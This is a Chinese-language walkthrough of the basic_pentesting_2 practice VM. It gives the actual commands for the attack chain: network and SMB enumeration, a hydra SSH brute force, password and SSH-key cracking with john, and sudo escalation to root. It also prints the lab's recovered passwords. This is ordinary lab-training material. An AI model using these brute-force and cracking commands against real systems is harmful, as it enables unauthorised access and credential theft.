basic_pentesting_2
arp-scan -l查找靶机IP
masscan 192.168.253.154 --ports 0-65535 --rate=10000 端口扫描
nmap扫描nmap -T5 -A -p- 192.168.253.154
目录扫描80端口
http://192.168.253.154/development/dev.txt
2018-04-23: I’ve been messing with that struts stuff, and it’s pretty cool! I think it might be neat
to host that on this server too. Haven’t made any real web apps yet, but I have tried that example
you get to show off how it works (and it’s the REST version of the example!). Oh, and right now I’m
using version 2.5.12, because other versions were giving me trouble. -K
2018-04-22: SMB has been configured. -K
2018-04-21: I got Apache set up. Will put in our content later. -J
http://192.168.253.154/development/j.txt
For J:
I’ve been auditing the contents of /etc/shadow to make sure we don’t have any weak credentials,
and I was able to crack your hash really easily. You know our password policy, so please follow
it? Change that password ASAP.
-K
两个文档大概意思是:
struts是2.5.12版本,并且密码/etc/shadow 里的容易破解
访问8080端口,没找到东西
主页的登录http://192.168.253.154:8080/是tomcat
有提到 three samba服务获取数据。
可以使用enum4linux工具枚举Windows和samba中的数据
enum4linux —扫描共享文件
使用方法: enum4linux 192.168.253.154
Windows 访问共享文件:
\ip\文件夹名称
发现用户Kay,Jan
九头蛇爆破ssh密码
hydra -l jan -P /usr/share/wordlists/rockyou.txt.gz 192.168.236.138 ssh
得到密码 armando 用户 jan
ssh登录jan
发现kay目录下有密钥文件,没权限
vim读取kay密码
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
sudo -l 发现kay 权限为 ALL 直接sudo su切换为root用户,在根目录下得到flag
/home/kay/.ssh目录下,有ssh的公钥和私钥信息
复制 RSA 密钥
在kali中创建个key文件,将私钥内容复制到其中保存
使用 ssh2john 将密钥转换为 John the Ripper 的可破解文件
python ssh2john.py key > ssh_login
可以将key创建到ssh2hohn.py文件的目录下
ssh2hohn.py目录在 /usr/share/john
得到了密钥的哈希值
然后使用命令 john --wordlist=/usr/share/wordlists/rockyou.txt ssh_login 破解
成功拿到密码 beeswax
获得密码后,回到以 jan 的身份 ssh 包含 RSA 密钥的文件夹,然后使用以下命令将用户切换到 kay
ssh -i id_rsa kay@192.168.253.154
在使用john进行shadow文件破解时,如果已经开了一个john的进程,这回提示以下错误:
Crash recovery file is locked: /root/.john/john.rec
意思是/root/.john/john.rec文件被锁定。
通过测试只要把 /root/.john/john.rec这个文件删除就不会报错了。
所以可以通过 watch rm -rf /root/.john/john.rec 命令。每两秒删除一次这个文件。
再开多个进程进行shadow文件批量破解即可。建议一次不要开太多。